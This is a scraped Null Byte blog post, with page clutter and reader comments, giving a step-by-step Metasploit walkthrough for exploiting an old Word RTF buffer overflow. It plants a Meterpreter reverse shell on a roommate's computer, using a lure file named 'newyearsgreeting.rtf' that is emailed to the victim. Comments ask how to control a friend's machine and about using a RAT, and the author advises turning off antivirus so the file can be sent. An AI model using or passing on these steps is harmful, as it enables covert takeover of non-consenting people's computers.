Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer In my last hack blog on crashing your roommates Win7 system, we started looking at client- side attacks. As promised, we will be looking at some more client-side attacks. As web server and OSs have become hardened and living behind significant perimeter defenses, hackers have migrated to the easiest route to the pot of gold. This is through the often unpatched, unhardened client-side system with little in the way of defenses and a plethora of vulnerable software, including the ubiquitous Microsoft Office products. This hack will work on the Word 2007 or Word 2010. It exploits a buffer overflow in Word to allow us to plant a listener on our target system. Im assuming that you have the victims IP address and have verified the Microsoft Office is running (a good assumption, but its better to verify). So, let fire up Metasploit and find the exploit/windows/fileformat/ms10_087_rtf_pfragments_bof. Now, set Metasploit to use this exploit by typing: msf >use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof Popular Now Related Follow Null Byte The aspiring grey hat hacker / security awareness playground World Home How-To Inspiration Forum Creators How to Get Floating Chat Head Notifications for All Apps on Your Samsung Galaxy Note 2 4 Ways to Crack a Facebook Password and How to Protect Yourself from Them How to Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet! How to Install Je Bean 4.2's Photo Sphere Camera & Gallery on Your Samsung Galaxy 2 Posted By occupytheweb otw 809 5 months ago Follow 25 KUDOS Step 1: Start Metasploit How to Manage & Recover Your Facebook Chat & Messages History 4 Ways to Crack a Facebook Password and How to Protect Yourself from Them Hack Like a Pro: How to Embed a Backdoor Connection in an Innocent-Looking PDF Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected Hack Like a Pro: How to Exploit IE8 to Get Root Access When People Visit Your Website Hack Like a Pro: How to Remotely Grab a Screenshot of Someone's Compromised Computer Hack Like a Pro: How to Save the World from Nuclear
Worlds Login | Signup Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer Null Byte http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/[6/1/2013 12:04:28 AM] Then we need to set a payload. In this case, we wish to use Metasploits powerful Meterpreter to establish a listener on the victim's system. msf exploit( ms10_087_rtf_pfragments_bof) > set payload windows/meterpreter/reverse_tcp Now, let's look at our options. As you know from my previous Metasploit blogs, every exploit has options, some mandatory and some not. Let's take a look at the options for this exploit by typing msf >show options Newest How to Really Connect Your Instagram Account to Facebook on Your iPhone DENA SPENCER commented on Community Step 2: Set a Payload Step 3: Show Options Annihilation Hack Like a Pro: How to Remotely Grab Encrypted Passwords from a Compromised Computer How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities Hack Like a Pro: How to Bypass Antivirus Software by Disguising an Exploit's Signature How to Hack digital pictures to send secret messages Hack Like a Pro: How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell Hack Like a Pro: How to Remotely Install an Auto- Reconnecting Persistent Back Door on Someone's PC The Difference Between Http and Https Skype Backdoor THANK YOU! i've been screwing around all day trying to get these apps relinked after i Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer Null Byte http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/[6/1/2013 12:04:28 AM] We can see from the screenshot above that Metasploit has a number of options for this exploit. First, we are creating a .rtf file and Metasploit gives it a default name of FILENAME. Let's change that name to something more inviting to our victim, such as newyearsgreeting.rtf msf >set FILENAME newyearsgreeting.rtf Next we need to set the LHOST or the local host. This will be the system we will be listening from--usually our local system--but it could be any system you want to listen from. We simply need to set the LHOST with the IP address of our listening system, in this case 192.168.1.100. msf> set LHOST 192.168.1.100 Before we exploit the victim's system, let's check to make sure all our options are set properly. msf> show options How to Score a Full Version of Microsoft Office for Only $10 NELSON AGUILAR published How to Make the Stock Weather Widget Transparent on Your Samsung Galaxy S4 FAISAL HUSSAIN published Hack Like a Pro: How to Crack User Passwords in a Linux System J IM BOB commented on How to Root Your Samsung Galaxy S4 (GT-I9500) RAED NOOR commented on How to Build a RC Base That Moves Around 15 Kilos BRIAN RODRGUEZ published Step 4: Change FILENAME Step 5: Set Your Local Host Step 6: Last Check of Options made across the board password updates. This FINALLY got me straight! I really appreciate this tutorial. It has just enough detail while still being nice and quick to read through. what if i can't find the installation option from recovery mode ? it's all done and everything is find except installation the zip file ... Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer Null Byte http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/[6/1/2013 12:04:28 AM] Note in the screenshot that the FILENAME is now set to newyearsgreeting.rtf and the LHOST is 192.168.1.100. Now, we are ready to exploit. Simply type: msf > exploit You can see that Metasploit has generated a file called newyearsgreeting.rtf and placed it at /root/.msf4/local/newyearsgreeting.rtf. Now we need to send this file to the victim through email or other method. Once the victim opens the file, the Word application will hang or crash leaving us with an active session of Meterpeter on the victims system. With an active Meterpreter session on the victim's system, we have nearly total control or "own" their system. Step 7: Exploit Step 8: Send the File to the Victim Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer Null Byte http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/[6/1/2013 12:04:28 AM] Remember to Give Kudos, Tweet, Like, & Share PETTER RONESS MADSHU S 1 3 months ago Reply Say i send the listener to a friend just for laughs, what do i do when he opens it? Do i have to use commands to control his computer? If you have tutorials on this it would be much appreciated ^^ HARRISO N DOCHOF F 1 3 months ago Reply Question, instead of using metaspoloit's meterpeter as the payload coud you use a Darkcomet RAT .exe? Also which is better and has more options i only have experience with RATs? if anyone can answer this it would help me alot thanks. RONALD ALLAN 1 2 months ago Reply MSF is far more better that DarkComet. It has more post-exploitation options than DarkComet. And as a personal preference I prefer the command line than the GUI. I even prefer the MSFCONSOLE than the MSFWEB or ARMITAGE. It's a lot faster to navigate once you master the keyboard commands. JERET CHRISTO PHER 2 2 months ago Reply hi, how do i get to meterpreter? what do i do once the file is opened? RIZARD GRIGORE 1 2 weeks ago Reply I can't send it via e-mail, it detects a virus and wont let me send it OCCUPY THEWEB OTW 1 2 weeks ago Reply Rizard: Turn off your antivirus. OTW Subscribe YOU Hack Like a Pro: How to Embed a Backdoor Connection in an Innocent-Looking PDF Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected Hack Like a Pro: How to Exploit IE8 to Get Root Access When People Visit Your Website Show More... Join the Discussion Share Your Thoughts See Also OFF Click to share your thoughts ATTACH Hack Like a Pro: Exploit MS Word to Embed a Listener on Your Roommate's Computer Null Byte http://null-byte.wonderhowto.com/how-to/hack-like-pro-exploit-ms-word-embed-listener-your-roommates-computer-0140868/[6/1/2013 12:04:28 AM] Popular How-To Topics in Computers & Programming Trending Across WonderHowTo Arts Arts & Crafts Beauty & Style Dance Fine Art Music & Instruments Science & Tech Autos, Motorcycles & Planes Computers & Programming Disaster Preparation Education Electronics Film & Theater Software Weapons Lifestyle Alcohol Business & Money Dating & Relationships Diet & Health Family Fitness Food Home & Garden Hosting & Entertaining Language Motivation & Self Help Outdoor Recreation Pets & Animals Pranks & Cons Spirituality Sports Travel Gaming Gambling Games Hobbies & Toys Magic & Parlor Tricks Video Games About Us Privacy Policy Terms & Conditions Create new skype account Get peoples facebook passwords Facebook bypass privacy Hack a website password How to Crack fb password How to Hack wifi passwords How to Hack wifi with ps3 Crack facebook password How to Facebook color text Hack another computer on you Hack computer through wifi Hack other people webcam Dreamweaver and sql database Hack another computer Easy way to hack an email pas Create new skype account Hack download speed of intern Tracfone hack free google voice Write in bold text on facebook How to Hack fb password Hack router password How to Hack product key Crack facebook password Crack website passwords How to Get Floating Chat Head Notifications for All Apps on Your Samsung Galaxy Note 2 How to Install Jelly Bean 4.2's Photo Sphere Camera & Gallery on Your Samsung Galaxy Note 2 How to Get Rid of the Annoying Input Notification & Keyboard Icon on Your Samsung Galaxy S4 How to Get Out of Your AT&T Contract Early Without an Early Termination Fee (ETF) How to Play Your Favorite Retro Video Games Right on Your Samsung Galaxy Note 2 How to Get Auto-Rotating Google Now Wallpapers on Your Samsung Galaxy S3 Home Screen How to Get the Galaxy S4's Polaris Office 5 to Edit Microsoft Office Docs on Your Samsung Galaxy Note 2 Hack Like a Pro: How to Crack User Passwords in a Linux System